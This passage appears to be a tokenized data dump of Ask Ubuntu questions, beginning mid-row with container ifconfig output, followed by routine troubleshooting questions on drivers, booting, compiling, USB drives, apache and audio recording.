inet6-adresse : fe80 : :225:90ff : fe57 : f8/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx-pakete:128248 fehler:0 verloren:15 überläufe:0 fenster:0 tx-pakete:3835 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:11076138 ( 11.0 mb ) tx-bytes:343557 ( 343.5 kb ) eth0 link encap : ethernet hardware adresse 00:25:90:57:00 : f8 up broadcast running multicast mtu:1500 metrik:1 rx-pakete:129421 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:4046 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:13510902 ( 13.5 mb ) tx-bytes:449527 ( 449.5 kb ) interrupt:16 speicher : fb900000-fb920000 lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 gültigkeitsbereich : maschine up loopback running mtu:65536 metrik:1 rx-pakete:2 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:2 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:176 ( 176.0 b ) tx-bytes:176 ( 176.0 b ) lxcbr0 link encap : ethernet hardware adresse ae:2c:57 : c2 : f0:24 inet adresse:10.0.3.1 bcast:10.0.3.255 maske:255.255.255.0 inet6-adresse : fe80 : :ac2c:57ff : fec2 : f024/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx-pakete:0 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:8 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:0 ( 0.0 b ) tx-bytes:648 ( 648.0 b ) vethrtx30h link encap : ethernet hardware adresse fe:97:2b:8e:90:8a inet6-adresse : fe80 : :fc97:2bff : fe8e:908a/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx-pakete:39 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:14826 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:3282 ( 3.2 kb ) tx-bytes:1466740 ( 1.4 mb ) my container 's 'ifconfig' eth0 link encap : ethernet hardware adresse 00:16:3e:6c:7c:79 inet adresse:91.143.88.119 bcast:91.143.88.255 maske:255.255.255.0 inet6-adresse : fe80 : :216:3eff : fe6c:7c79/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx-pakete:20082 fehler:0 verloren:2 überläufe:0 fenster:0 tx-pakete:40 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:2005479 ( 2.0 mb ) tx-bytes:3368 ( 3.3 kb ) lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 gültigkeitsbereich : maschine up loopback running mtu:65536 metrik:1 rx-pakete:0 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:0 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:0 ( 0.0 b ) tx-bytes:0 ( 0.0 b ) 'tail /proc/sys/net/bridge/* ' on the host == > /proc/sys/net/bridge/bridge-nf-call-arptables < == 0 == > /proc/sys/net/bridge/bridge-nf-call-ip6tables < == 0 == > /proc/sys/net/bridge/bridge-nf-call-iptables < == 0 == > /proc/sys/net/bridge/bridge-nf-filter-pppoe-tagged < == 0 == > /proc/sys/net/bridge/bridge-nf-filter-vlan-tagged < == 0 == > /proc/sys/net/bridge/bridge-nf-pass-vlan-input-dev < == 0 finally 'ping 8.8.8.8 ' in the container : ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . ^c -- - 8.8.8.8 ping statistics -- - 3 packets transmitted , 0 received , 100 % packet loss , time 2015ms
522458	evga uv plus usb to vga adapter does not display output	i have a evga uv plus usb to dvi adapter . i tried to connect this to an acer monitor . the monitor is recogznized by ubunu when its connected as seen here however , when i enable the display , and click apply , the laptop display becomes very slow and there is no output on the monitor . anyone knows if this can be fixed ? tried in ubuntu 14.04.1 - 3.13 kernel and 3.15.x kernel using intel graphics . lspci flex2 : ~ $ lspci 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 0b ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 0b ) 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 0b ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1c.4 pci bridge : intel corporation lynx point-lp pci express root port 5 ( rev e4 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8723be pcie wireless network adapter 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 10 ) 04:00.0 3d controller : nvidia corporation gf117m [ geforce 610m/710m/820m / gt 620m/625m/630m/720m ] ( rev ff ) lsusb flex2 : ~ $ lsusb bus 002 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 005 : id 04f3:0333 elan microelectronics corp . bus 001 device 004 : id 0bda : b728 realtek semiconductor corp . bus 001 device 010 : id 17e9:0371 displaylink bus 001 device 003 : id 5986:055e acer , inc bus 001 device 002 : id 046d : c05a logitech , inc. m90/m100 optical mouse bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
522459	ubuntu 14.04 does not boot	can you please help me , after performing system updates on ubuntu 14.04.1 , my laptop does not boot , only blank screen . i have tried using repair disk but no joy . my file is : http : //paste.ubuntu.com/8310674
522460	screen flickering xubuntu 14.04	i updated my xubuntu 14.04 to the last version and now i have screen flickering every 2 or 3 seconds . i have a ati radeon x1200 , my laptop is a toshiba .
522461	make error during compiling gtk+-2	iá¸ż trying to compile gtk+-2.0 it gave an error during the make phase . make [ 4 ] : map '/home/david/src/gtk+-2.99.3/gtk ' wordt binnengegaan ccld gtk-query-immodules-3.0 /usr/bin/ld : queryimmodules.o : undefined reference to symbol 'g_module_symbol' /usr/lib/i386-linux-gnu/libgmodule-2.0.so.0 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status makefile:2073 : recept voor doel 'gtk-query-immodules-3.0 ' is mislukt make [ 4 ] : *** [ gtk-query-immodules-3.0 ] fout 1 make [ 4 ] : map '/home/david/src/gtk+-2.99.3/gtk ' wordt verlaten makefile:2506 : recept voor doel 'all-recursive ' is mislukt make [ 3 ] : *** [ all-recursive ] fout 1 make [ 3 ] : map '/home/david/src/gtk+-2.99.3/gtk ' wordt verlaten makefile:1943 : recept voor doel 'all ' is mislukt make [ 2 ] : *** [ all ] fout 2 make [ 2 ] : map '/home/david/src/gtk+-2.99.3/gtk ' wordt verlaten makefile:677 : recept voor doel 'all-recursive ' is mislukt make [ 1 ] : *** [ all-recursive ] fout 1 make [ 1 ] : map '/home/david/src/gtk+-2.99.3 ' wordt verlaten makefile:570 : recept voor doel 'all ' is mislukt make : *** [ all ] fout 2 can someone help me solving this error ? i already have glib 2.41.3 and using ubuntu 14.10
522463	is it possible to individually uninstall packages previously installed using a meta-package ?	i have no need for the help utility , document viewer , contacts app , etc . that gnome has built into the gnome-shell . is is possible to remove just those packages ? every time i try it wants me to remove gnome3 all together . i feel like this should be possible and that i am missing something . any ideas ? thanks in advance .
522464	dell xps 15 ubuntu freezes randomly	after working for years without any problems on my dell xps 15. this week my laptop started to freeze randomly sometimes in minutes and sometimes after a day of work . so i decided to update my os from 12.04 to ubuntu 14.04 but it does not fix the issue . the laptop still freezes at random . mouse and keyboard stops responding . but music etc . keeps playing . i have to hard reset the laptop how do i diagnose such kind of issue in ubuntu ? memtest finished without any problems specs : 2nd-gen intel® core™ i7-2630qm processor 2 , ghz met turbo boost 2.0 , tot 2,9 ghz 4.096 mb 1.333 mhz dual channel ddr3 [ 2 x 2.048 ] 2gb nvidia® geforce® gt 540m 500 gb ( 7.200 rpm ) serial ata intel® centrino® wireless-n 1000 ubuntu 12.04 / ubuntu 14.04 ( fresh install )
522467	virtualbox 4.3.16 issue with unity launcher	i just updated to virtualbox 4.3.16 and now when putting my guest os in fullscreen the unity launcher stays over the top of the screen . this makes using full screen unworkable . does anyone have a suggestion to fix this issue ?
522468	ubuntu 14.04 battery issue : not charging	i currently use both windows 7 and ubuntu 14.04 on my lenovo thinkpad edge e430 laptop , while on windows the battery 's charging works fine on ubuntu it some ( many ) times does n't charge when plugged after being on battery and then being plugged in . this is a similar link but the solution did n't work or i did n't applied it correctly like above post i went to the grub menu for editing ( by pressing e ) and the entered command-line interface ( by pressing f2 ) and there typed `` acpi=nolapic '' ( no quotes ) , i even checked acpi value by echoing it ( echo $ acpi ) which gave output `` nolapic '' ( no quotes ) then typed exit and came out of the grub menu . please guide me with the solution for it as this is creating a lot of problem for me in my work .
522470	how to open to use it ?	i have installed ubuntu 14 on my dell laptop which runs windows 8.1. but i 'm not able to use ubuntu and no options to open it as i was expecting dual boot installation.so when i try to re-installation it ask for un-installation of previous . so please help me in this . thank you harsha hn .
522474	live usb problem	recently i created a live ububtu usb ( using universal usb installer ) . when i booted my computer using the usb ( my computer has no operating system installed by the way ) i checked my installation media for errors and two were detected . my question is how do i fix these errors ?
522476	locate files matching mimetype in a directory recursively via command line	i wish to get a list of all files in a project folder [ recursively ] that are image files . unfortunately google was unable to help me here . if possible , the use of current system 's mimetypes is preferred , eg all files that have a mime matching the glob image/* ; so that any example could be easily extended for video/* , etc . additionally , commands that do n't need to do expensive operations on every file in the entire directory are preferred as i might be trying to use this on some pretty huge volumes . note : a potential work around i have considered is fetching the list of file extensions from the mimetypes data and doing a find for these extensions , this is however less preferred due to the file extensions of the target files i 'm wanting to locate may be missing , double loaded , etc . edit : @ kasiya pointed out a thread exemplifying searching for files by extension , which i consider pretty trivial and not exactly what i 'm looking for ; i 've edited the title to reflect that i 'm looking specifically for mimetype based results .
522479	ubuntu touch on normal android	i am new to linux . i have just rooted my android tablet and am preparing to install ubuntu touch . here are the specs : 1.5 ghz cortex a9 dual core -- 1 gb ram -- 2 gb internal storage ( 900 mb available ) with sd card support -- usb otg -- screen 8 inch -- res : 1024 x 768 for installation , i am using http : //www.pcadvisor.co.uk/how-to/linux/3531970/how-install-ubuntu-touch/ guide . however , since my device is not supported , i am a bit confused as to how should i proceed . where do i find the installation files for my device , which happens to run on an arm processor ? will i be able to run ubuntu touch on my tablet ? please comment on both the aspects ; hardware as well as confusion over installation file .
522481	key mapping on bamboo cth-470	i downloaded ubuntu studio 14.04 for my wife and her bamboo touch works but we ca n't figure out how to map the keys . is there a third party program to use or what ?
522482	bluetooth was n't working in dell laptop	i installed ubuntu 14.04 alongside windows 7 on my dell vostro 14 laptop yesterday . everything worked fine . i could connect my phone on both ubuntu and windows ( in that order ) by bluetooth and surf the internet . i then tried to connect it again on ubuntu but it was n't connected , i also downloaded and installed blueman but still no luck . my only option of connecting to the internet is through my phone , help me solve this issue .
522484	how to turn off / hide the mouse when screensaver is active in kde 4 ?	i 've got a standard ubuntu system with kde 4.13 . it could probably be considered 'kubuntu ' . when the screensaver comes on , the mouse is visible and quite prominent on top . how do i set the screensaver to turn off the mouse or hide the mouse cursor ? uname -a linux hostname 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux
522489	screen turn black and white ( snow ) after using video function	i have been using ubuntu for more than a year or so . it works well until recently it starts to freeze frequently after i watched videos online for a few minutes or video chat with someone for a while . the screen will turn to white and black , like tv turns into snow . could anyone tell me whether it is my hardware problem or os system problem ?
522490	network carashes	using ubuntu 12.04 lts 64bit with a brand new system on a gb network ( wired ) . the ip is set by the machine and connected to a linksys e42000 router . using onboard gb nic card mainly used as a gaming server and ftp server box . when i ftp to the box with filezilla locally , the network crashes the box is fine except there is no network or internet connection . sometimes the connection will come back and ftp will resume but crash again and i have to restart the system again . can this be caused by the ftp uploading/downloading to fast ? all other machines connected to the network still have network and internet access . sorry for being a bit vague on describing the issue but im not used to linux
522491	trim for sdd in trusty	i have 4 partitions in trusty : on sdd there are 3 : 'boot/efi ' , swap & one mounted at / which contains all other directories except /home ; on hdd there is one mounted at /home containing /john ( i.e . user 's home directories ) . i have seen various instructions ( e.g . howtogeek website ) re trim . what is recommended for my setup ?
522493	menu in title bar for all users	how may i apply the setting to all users on a given system ?
522496	do i have to explicitly declare ports if i 've defined an interface ?	do i have to do open_port 80 in my install hook if i declare my app to be http , or will juju expose do that for me ?
522498	is there a way to force destroy a machine ?	i 've got a unit that is stuck in pending mode , how can i forcefully destroy it ?
522500	setup webgoat on ubuntu 14.04 with lamp server	can any one give me the breif instructions for how to install webgoat on ubuntu 14.04 ( not a server ) step wise i am facing problem with setting java_home variable to java 1.5 jdk
522504	ubuntu restarts after shutdown	i 've a problem with my laptop ( hp 4540s h6r10ea ) that does n't want to shut down under ubuntu 14.04 . it shut downs and after 2 secs starts again . tried everything that i could find online : unchecked bios settings like start on lan or usb , gksudo gedit /etc/default/grub and editing grub_cmdline_linux_default . the problem most likely came from my efforts to enable bluetooth , i 've another post from today actually , tried to purge the rtbth package and unblock the default driver to return to it ( by the way rfkill list returns nothing and it used to give me at least my wireless card ) . i 've windows 8.1 dual booting and when i switch to it i can shut down my laptop and it does n't start again , so it must come from my ubuntu os and close from reinstalling it , becaust it was working yesterday ( ok my bluetooth was n't but i see this is a common issue with rt3290 wireless card ) .
522505	script to monitor internet connection stability	guys . i 'm an unexperienced ubuntu user and i need your help . i would like to be reporteded everytime that the my router loses its internet connection . i mean , i would like to have my ubuntu send me an email everytime that the router 's system log displays the message `` ethernet link down '' . is that possible ? i believe that i would have to write a script , am i right ?
522506	get localhost login command when trying to open ubuntu	i am sorry if this is a very simple question , but i am stuck . i put ubuntu saucy with unity on my acer c720 using crouton . everything was working well until the chrome os froze and i had to reboot . now , when i try to get back into ubuntu the screen says , localhost login . when i put in the username and password i set up during the installation , it tells me my login is incorrect . am i doing something wrong ? thanks , jason
522507	ca n't boot in windows 8.1 after dual botting in ubuntu	i need your help with this . i am in a big trouble so i hope you can help me . i created a dual boot in my laptop . i have a pre-installed windows 8.1 os . and before installing ubuntu . i shrink my disk . then i installed the ubuntu . at first i can boot in windows and ubuntu . but after running the bootrepair inside ubuntu . i can not boot into my windows . here 's the pastebin of my result : http : //paste.ubuntu.com/8311689/ i have so many important files in the windows that i need to do . please help me with this . i am a really big trouble because i need to finish some projects that is running in windows . : ( ok that 's all guys thanks .
522508	14.04 ca n't use budgie desktop and other environments are same as ubuntu	when i choose budgie desktop from environment selection menu and entering my password , lock screen repeats itsself , it doesnt open . and other environments are not working . they all as same as ubuntu desktop . if they are not , they crash or something goes wrong like mouse is not working etc.. but all environments are working on guest session . please help !
522509	can not make primary patition or logical ( mbr to gpt )	i wish to make dual boot windows and ubuntu on del inspion 5721 comes with ubuntu installed hard disk consists of 3 primary and extended swap partitions in order to get new partitions from free space for windows and make dual boot with gparted , gparted cant make new primary or extended because swap is there in mbr . i have found a guide for mbr to gpt http : //falstaff.agner.ch/2012/11/20/convert-mbr-partition-table-to-gpt-ubuntu/ does converting mbr to gtp imply loss of data on hard disk partitions which are converted or not if successfull ?
522510	why is my window resizing in the wrong direction ?	somehow , i 've screwed up window resizing in ubuntu ( 14.04 ) . when i grab the top , right or left edge of a window with my mouse , everything works fine . but when i grab the bottom of the window , then when i move my mouse up , the edge of the window goes down , and vice versa . it 's very annoying and i have no idea how i got into that state . how did i get into this state and what can i do to fix it ?
522512	switch text direction in gedit	i want gedit to show all paragraphs in right-to-left view . i know that it renders paragraphs starting with rtl characters correctly . but i need paragraphs starting with ltr characters also shown as rtl . something like vim -f or set : rl command in vim.n
522513	unable to browse specific websites with netgear modem	i recently purchased a netgear dgn1000v3 modem-router for my home . i was using a d-link dsl-2750u , before it started giving network disconnection issues in the last one month . i setup internet on this modem . but i 'm seeing a strange behaviour with specific websites ( facebook being one of them ) on linux based platforms ( mozilla/chrome browsers on ubuntu and android ; same browsers on windows work fine ) . some http requests on these websites seem to time-out every time . i reconnected my old modem to check if this is an isp issue , but everything works fine with the old modem . troubleshooting the problem , i 've narrowed it down to browser cookies . disabling the cookies seems to help for a few of these websites . but many websites need cookies enabled to be functional . i tried clearing the cookie cached by the browser . seems to help for sometime , but after sometime , it goes back to the same behaviour . can someone help me figure out the issue here ? i tried contacting netgear support , but they 're asking me to contact linux support for this issue . this looks like some sort of interoperability issue between linux ( or it 's web browsers ) and this particular router ? or is it ; maybe changing the router just helped exposing this bug ? help appreciated . thanks . edit : i was even having problem submitting this question at askubuntu.com . i had to connect to another network to submit this question .
522514	google drive not synced with download file in ubuntu	i was under the impression that if i downloaded ubuntu using crouton that i would be able to share files between operating systems . i am running ubuntu saucy with unity and made a screencast which i saved in a folder within my downloads folder . when i went to the chrome os , the files were not in my downloads folder in my google drive . did i do something wrong , or did i misunderstand how it ws supposed to work ? thanks for the help , jason
522515	sandisk usb not detected by ubuntu 14.04 but detected by windows 7	i have a sandisk 16gb usb drive that is not being detected by ubuntu 14.04 but is detected by windows 7. lsusb detects it but sudo fdisk -l or blkid does n't . even gparted and disks do n't detect it . here 's some terminal output : lsusb bus 002 device 006 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e230/e270/e870 hsdpa/hsupa modem bus 002 device 004 : id 0781:5576 sandisk corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 002 : id 1a2c:0021 china resource semico co. , ltd keyboard bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 04f2 : b070 chicony electronics co. , ltd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub tail -f /var/log/syslog sep 10 22:28:22 xhakz kernel : [ 2203.587319 ] usb 2-2 : usb disconnect , device number 4 sep 10 22:28:25 xhakz kernel : [ 2206.212045 ] usb 2-2 : new high-speed usb device number 7 using ehci-pci sep 10 22:28:25 xhakz mtp-probe : checking bus 2 , device 7 : `` /sys/devices/pci0000:00/0000:00:1d.7/usb2/2-2 '' sep 10 22:28:25 xhakz kernel : [ 2206.344889 ] usb 2-2 : new usb device found , idvendor=0781 , idproduct=5576 sep 10 22:28:25 xhakz kernel : [ 2206.344895 ] usb 2-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 sep 10 22:28:25 xhakz kernel : [ 2206.344897 ] usb 2-2 : product : cruzer facet sep 10 22:28:25 xhakz kernel : [ 2206.344900 ] usb 2-2 : manufacturer : sandisk sep 10 22:28:25 xhakz kernel : [ 2206.344902 ] usb 2-2 : serialnumber : 4c532000030522108444 sep 10 22:28:25 xhakz mtp-probe : bus : 2 , device : 7 was not an mtp device usb-devices t : bus=02 lev=01 prnt=01 port=01 cnt=01 dev # = 7 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=0781 prodid=5576 rev=01.26 s : manufacturer=sandisk s : product=cruzer facet s : serialnumber=4c532000030522108444 c : # ifs= 1 cfg # = 1 atr=80 mxpwr=200ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver= ( none ) i do n't know what to do anymore to get it detected and i do n't want to format it as it contains important data . i backed up my data in another laptop , formatted the drive in windows 7 but still it 's not recognized . the funny thing is that windows 7 detects it and uses it fine but it 's not detected in ubuntu except by the lsusb command . weird . edit requested command output : sudo lsblk name maj : min rm size ro type mountpoint sda 8:0 0 149.1g 0 disk ├─sda1 8:1 0 1.5g 0 part ├─sda2 8:2 0 74.4g 0 part ├─sda3 8:3 0 1k 0 part ├─sda4 8:4 0 32g 0 part /media/kagz/new volume ├─sda5 8:5 0 1.9g 0 part [ swap ] └─sda6 8:6 0 39.4g 0 part / sr0 11:0 1 1024m 0 rom sudo lshw http : //paste.ubuntu.com/8332788/
522519	.htaccess error : invalid command 'authgroupfile '	before this i was working on windows and my project was working proper . recently i moved to ubuntu and i am trying setup project on lamp . i have created host for this ( windows i was running directly through localhost ) and when i am running it getting 500 internal server error . when i looked in my log file i got invalid command 'authgroupfile ' , perhaps misspelled or defined by a module not included in the server configuration . .htaccess file # php_value zend.ze1_compatibility_mode off authname `` restricted area '' authtype basic authuserfile /opt/lampp/htdocs/uniplex_mobile/.htpasswd authgroupfile /dev/null < files manageurls.html > require valid-user < /files > < files addurl.html > require valid-user < /files > < files editurl.html > require valid-user < /files > addtype application/x-httpd-php .php .htm .html my project is on smarty framework . can anyone help to solve this ? thanks in advance
522523	how to install java 1.5 jdk in ubuntu	i am getting this error when trying to install java 1.5 jdk sudo apt-get install sun-java5-jdk reading package lists ... done building dependency tree reading state information ... done package sun-java5-jdk is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : apt : i386 apt e : package 'sun-java5-jdk ' has no installation candidate
522525	alternative to 'gnome character map ' ?	is there a utility similar to 'gnome character map ' which allows searching by name ? i tend to google/bing for things like 'unicode white smiling face ' , but that does not work on an airplane âş .
522526	how to get gfortran to work with i386 ? i have `` undefined reference '' errors . how to get a compatible libf2c ?	i have ubuntu 14.04 on a 64-bit machine . i would like to run gfortran -m32 for my f77 fortran code that also uses i386 cern libraries . i downloaded ubuntu packages cernlib , lib32gfortran-4.8-dev , and gcc-multilib . but i got errors like this when i ran my command : $ gfortran -m32 -o -o out10 mbpart1ep0.f -l. -lmathlib -lkernlib -lcuba /tmp/ccs5njbz.o : in function `main__ ' : mbpart1ep0.f : ( .text+0x82 ) : undefined reference to `cuhre_' //usr/local/lib/libmathlib.a ( cgamma64.o ) : in function `wgamma_ ' : cgamma64.f : ( .text+0xd1 ) : undefined reference to `s_wsfi' cgamma64.f : ( .text+0xe5 ) : undefined reference to `do_fio' cgamma64.f : ( .text+0xea ) : undefined reference to `e_wsfi' ... to see my full error , go to my previous post . as someone suggested , these errors are caused by an incompatible f2c library . so i found that there is an i386 f2c library for ubuntu 14.04 . as shown below , i installed the f2c : i386 on my machine , replacing some previous packages . but then i got new errors when running gfortran -m32 ... -lf2c . gg @ gg-virtualbox : ~ $ aptitude search f2c i a f2c - fortran 77 to c/c++ translator p f2c : i386 - fortran 77 to c/c++ translator ... gg @ gg-virtualbox : ~ $ sudo aptitude install f2c : i386 [ sudo ] password for gg : the following new packages will be installed : binutils : i386 { ab } cpp : i386 { ab } cpp-4.8 : i386 { ab } f2c : i386 { b } gcc : i386 { ab } gcc-4.8 : i386 { ab } gcc-4.8-base : i386 { a } gcc-4.9-base : i386 { a } libasan0 : i386 { a } libatomic1 : i386 { a } libc6 : i386 { a } libc6-dev : i386 { a } libcloog-isl4 : i386 { a } libf2c2 : i386 { ab } libf2c2-dev : i386 { ab } libgcc-4.8-dev : i386 { a } libgcc1 : i386 { a } libgmp10 : i386 { a } libgomp1 : i386 { a } libisl10 : i386 { a } libitm1 : i386 { a } libmpc3 : i386 { a } libmpfr4 : i386 { a } libquadmath0 : i386 { a } linux-libc-dev : i386 { a } zlib1g : i386 { a } the following packages will be upgraded : linux-libc-dev 1 packages upgraded , 26 newly installed , 0 to remove and 114 not upgraded . need to get 22.5 mb of archives . after unpacking 74.5 mb will be used . the following packages have unmet dependencies : libf2c2 : conflicts : libf2c2 : i386 but 20090411-2 is to be installed . libf2c2 : i386 : conflicts : libf2c2 but 20090411-2 is installed . cpp-4.8 : conflicts : cpp-4.8 : i386 but 4.8.2-19ubuntu1 is to be installed . cpp-4.8 : i386 : conflicts : cpp-4.8 but 4.8.2-19ubuntu1 is installed . binutils : conflicts : binutils : i386 but 2.24-5ubuntu3 is to be installed . binutils : i386 : conflicts : binutils but 2.24-5ubuntu3 is installed . gcc : conflicts : gcc : i386 but 4:4.8.2-1ubuntu6 is to be installed . gcc : i386 : conflicts : gcc but 4:4.8.2-1ubuntu6 is installed . cpp : conflicts : cpp : i386 but 4:4.8.2-1ubuntu6 is to be installed . cpp : i386 : conflicts : cpp but 4:4.8.2-1ubuntu6 is installed . gcc-4.8 : conflicts : gcc-4.8 : i386 but 4.8.2-19ubuntu1 is to be installed . gcc-4.8 : i386 : conflicts : gcc-4.8 but 4.8.2-19ubuntu1 is installed . f2c : conflicts : f2c : i386 but 20100827-1 is to be installed . f2c : i386 : conflicts : f2c but 20100827-1 is installed . libf2c2-dev : conflicts : libf2c2-dev : i386 but 20090411-2 is to be installed . libf2c2-dev : i386 : conflicts : libf2c2-dev but 20090411-2 is installed . the following actions will resolve these dependencies : remove the following packages : 1 ) f2c 2 ) fort77 3 ) libf2c2 4 ) libf2c2-dev keep the following packages at their current version : 5 ) binutils : i386 [ not installed ] 6 ) cpp : i386 [ not installed ] 7 ) cpp-4.8 : i386 [ not installed ] 8 ) gcc : i386 [ not installed ] 9 ) gcc-4.8 : i386 [ not installed ] leave the following dependencies unresolved : 10 ) f2c : i386 recommends gcc : i386 11 ) libc6-dev : i386 recommends gcc : i386 | c-compiler : i386 accept this solution ? [ y/n/q/ ? ] y the following new packages will be installed : f2c : i386 gcc-4.9-base : i386 { a } libc6 : i386 { a } libc6-dev : i386 { a } libf2c2 : i386 { a } libf2c2-dev : i386 { a } libgcc1 : i386 { a } linux-libc-dev : i386 { a } the following packages will be removed : f2c { a } fort77 { a } libf2c2 { a } libf2c2-dev { a } the following packages will be upgraded : linux-libc-dev the following packages are recommended but will not be installed : bcc : i386 clang-3.3 : i386 clang-3.4 : i386 clang-3.5 : i386 gcc : i386 gcc-4.4 : i386 gcc-4.6 : i386 gcc-4.7 : i386 gcc-4.8 : i386 tcc : i386 1 packages upgraded , 8 newly installed , 4 to remove and 114 not upgraded . need to get 7,991 kb of archives . after unpacking 21.9 mb will be used . do you want to continue ? [ y/n/ ? ] y ... ... new errors when now using the -lf2c option ( ading -lm does n't have an effect ) . without this option , the errors are same as before . gg @ gg-virtualbox : ~/desktop/myfolder $ gfortran -m32 -o -o out10 mbpart1ep0.f -l. -lmathlib -lkernlib -lcuba -lf2c /tmp/cc66jegn.o : in function `main__ ' : mbpart1ep0.f : ( .text+0x82 ) : undefined reference to `cuhre_' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../libf2c.so : undefined reference to `main__' collect2 : error : ld returned 1 exit status does anyone know what i can do to fix this problem ?
522527	apache2 instances keep growing with page refreshes	on my web server running smf , after maybe a day , the url wont resolve ... . but the ip address works great . if i run ps aux | grep apache2 | wc -l it showed 150 + instances of apache running ... the only thing i knew to do was restart apache , which fixed the problem and started apache back at around 14 instances . if i refresh the homepage and then run ps aux | grep apache2 | wc -l the number creeps up by one . i am totally clueless on what to do to fix this ... version information : forum version : smf 2.0.8 ( more detailed ) current smf version : smf 2.0.8 gd version : 2.0 mysql version : 5.5.37-0ubuntu0.12.04.1 memcached : ? ? ? php : 5.3.10-1ubuntu3 server version : apache/2.2.22 ( ubuntu )
522531	reinstall ubuntu or delete the root password without having it ?	i have received a laptop from school but i ca n't download anything because there is a root password on it . i already used the grub screen by clicking on the shift button but the ' ( recovery mode ) ' line is n't in the menu . is there a way to reinstall ubuntu or delete the root password without having it ? thanks , jef
522532	1 nic , looking for 2 external ip address 's	fairly new to linux in general , i know enough to be dangerous and thats why i wanted to ask this question here . i am wondering if this is possible . i have 1 nic card . i want to assign 2 ip address 's to the same nic card . neither are internal 192.x.x.x but outside public ips . os is 14 thanks
522533	how to have identical keyboard layout in ubuntu 14.04 as it is on windows	i use slovak layout in ubuntu , but ( right ) alt + < key > is absolute different as in windows . for example when i press ( right ) alt + p i get in windows ' but in ubuntu ăž is there a way to set the alt layout exactly as it is on windows ? thx : )
522534	possible to replicate sources.list as individual sources.list.d .list files ?	i 'm using puppet 's apt module , & i 'd like to clear out sources.list & have the same structure as individual sources.list.d .list files . i 've tried several variations on the formatting of the files without success . i initially just tried copying the sources.list entries into individual files , but apt-get update complained about being unable to retrieve headers due to inability to find a certain entry . is it possible to do what i 'm trying to do , and if so , can someone point me at the formatting documentation ?
522535	how to configure audacity for recording from vinyls ?	i am transferring my vinyls using audacity via usb . i just set the 24-bit and 96khz but when i record the audio has these almost like micro-shuttering lag and at some points slows down and then speeds up . the recording is then chunky but the first 30 seconds are fine.this has nothing to do with the turntable , the turntable is working perfectly . what do i need to configure in audacity for the recording to be smooth because even on crappy quality recording it still has these problems . here is the link to google drive of a song i recorded just under 2 minutes https : //drive.google.com/file/d/0bwyvojbpxvliswhssm9xrglfs0e/edit ? usp=sharing
